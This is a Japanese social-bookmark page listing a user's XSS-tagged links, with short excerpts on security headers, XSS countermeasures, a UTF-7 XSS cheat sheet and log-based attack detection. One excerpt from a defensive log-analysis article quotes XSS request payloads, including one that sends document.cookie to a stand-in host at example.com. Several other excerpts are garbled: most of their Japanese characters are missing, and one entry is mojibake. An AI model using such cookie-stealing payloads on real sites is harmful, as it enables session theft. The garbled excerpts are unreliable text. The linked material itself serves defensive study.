タグ

XSSに関するkaitonのブックマーク (16)

  • 商用環境で設定しておきたいセキュリティ関連 HTTP ヘッダまとめ - A Memorandum

    TL;DR X-Content-Type-Options X-Frame-Options(XFO) X-XSS-Protection Content-Security-Policy (CSP) Upgrade-Insecure-Requests Strict-Transport-Security (HSTS) Public-Key-Pins (HPKP) 設定 TL;DR X-Content-Type-Options MIME スニッフィングの無効化 X-Frame-Options(XFO) フレーム表示を制限しクリックジャッキングを予防 X-XSS-Protection XSSフィルタの有効/無効 Content-Security-Policy (CSP) XSSなどの攻撃を軽減するセキュリティレイヤー Strict-Transport-Security (HSTS) HTTP の代わり

    商用環境で設定しておきたいセキュリティ関連 HTTP ヘッダまとめ - A Memorandum
  • 2011年5月版 収束見えないソニー関連の攻撃 - @IT


     bogus.jp 2011/6/9 56PlayStation NetworkPSN IT5 4PlayStaionNetworkPSN1
  • ウェブ健康診断 - 財団法人 地方自治情報センター(LASDEC)


     20  Web We
    kaiton
    kaiton 2009/04/13
    基本的にして十分なウェブ診断(勉強にもなる)、検討委員会の顔ぶれも壮観
  • JP Domain XSS Site List

    Status ����unfixed�פˤʤäƤ��륵���ȴ���Ԥϡ��к�»ܸ��Ŭ�ڤ�Ϣ��򤷤� Status ���ѹ����Ƥ�餤�ޤ��礦��

  • XSSed | Cross Site Scripting (XSS) attacks information and archive

    Another Ebay permanent XSSWritten by KFTuesday, 13 November 2012 The Indian security researcher Shubham Upadhyay aka Cyb3R_Shubh4M, sent us a new permanent XSS affecting the products listings on Ebay.com read more... F-Secure, McAfee and Symantec websites again XSSedWritten by DPFriday, 13 January 2012 Once again, the websites of the three famous antivirus vendors are vulnerable to cross-site scri

  • UTF-7 XSS Cheat Sheet

    Countermeasures against XSS with UTF-7 are: Specify charset clearly (HTTP header is recommended) Don't place the text attacker can control before <meta> Specify recognizable charset name by browser. For more information about UTF-7 trick, see "Cross-site scripthing with UTF-7". These XSS patterns are tested on IE6 and IE7. Yosuke HASEGAWA <hasegawa@openmya.hacker.jp> Last modified: 2008-01

    kaiton
    kaiton 2008/01/11
  • もいちどイチから! HTTP基礎訓練中 連載インデックス - @IT -


    XSS  HTTP1 Web  2007/9/28   HTTP2 WebHTTP 2007/10/26 Ajax  HTTP3 AjaxWeb2.0Ajax2.0 2007/12/7
  • もいちどイチから! HTTP基礎訓練中 第1回 XSSは知ってても、それだけじゃ困ります? ― @IT


     Web  Web        2    
    もいちどイチから! HTTP基礎訓練中 第1回 XSSは知ってても、それだけじゃ困ります? ― @IT
    kaiton
    kaiton 2007/10/01
  • Webサーバへの攻撃を見抜く

    GET /sample.cgi?language=ja&country=JP &page=<script>alert('foo')</script> HTTP/1.1 GET /cgi-bin/sample.cgi?A=execute&U=&CF=search-simple &nv=ie&S=%3Cscript%3Ealert%28%22test%22%29%3B%3C%2F script%3E&So=RDATE&Sp=AND GET /cgi-bin/sample.cgi?doc=<%73cr%69pt>document.location= ('http://example.com/test.php?c='+document.cookie)<%2f%73 %63%72%69%70t> sample.cgiはWebフォームで、入力された文字に対して全くチェックを行っていない脆弱なcgiとす

    Webサーバへの攻撃を見抜く
  • @IT:クロスサイトスクリプティング対策の基本


    Web 稿 XSSCross Site ScriptingCSSCascading Style SheetsCSSXSS稿
    @IT:クロスサイトスクリプティング対策の基本
    kaiton
    kaiton 2007/07/10
  • JVN に掲載されたクロスサイト・スクリプティング問題

    ■JVN に掲載されたクロスサイト・スクリプティング問題 (2007/06) JVNに掲載された2007年06月分のクロスサイト・スクリプティング問題は9件です。 JVN#07100457 Apache Tomcat におけるクロスサイト・スクリプティングの脆弱性 JVN#16535199 Apache Tomcat の Accept-Language ヘッダの処理に関するクロスサイト・スクリプティングの脆弱性 JVN#23891849 ADPLAN におけるクロスサイト・スクリプティングの脆弱性 JVN#44532794 rktSNS におけるクロスサイト・スクリプティングの脆弱性 JVN#63602912 dotProject におけるクロスサイト・スクリプティングの脆弱性 JVN#64851600 Apache Tomcat 付属のサンプルプログラムにおけるクロスサイト・スクリプティ

    JVN に掲載されたクロスサイト・スクリプティング問題
    kaiton
    kaiton 2007/07/10
  • ウェブアプリケーションセキュリティとバッドノウハウ、そしてグッドラッパーの関係


    by ----------------------------------  ---------------------------------- SeaSurfers ML  XSS 
  • まだまだあるクロスサイト・スクリプティング攻撃法


    HTMLHTMLHTML HTML Web CSS UTF-7 <SCRIPT>AURL HTMLCSS
    まだまだあるクロスサイト・スクリプティング攻撃法
    kaiton
    kaiton 2007/04/17
  • 対策遅らせるHTMLエンコーディングの「神話」


    WebHTMLJavaScriptHTML WebHTML1 1entity referenceHTML HTML HTM
    対策遅らせるHTMLエンコーディングの「神話」
  • マルチバイトの落とし穴 − @IT


    SQL Web       Web         
    マルチバイトの落とし穴 − @IT
  • 星野君のWebアプリほのぼの改造計画 連載インデックス - @IT -


     Web1 WebWeb32005/10/15 3 Web Web  Web Web2 Web調2005/11/19  admin admin SQL   WebSQL Web
  • 1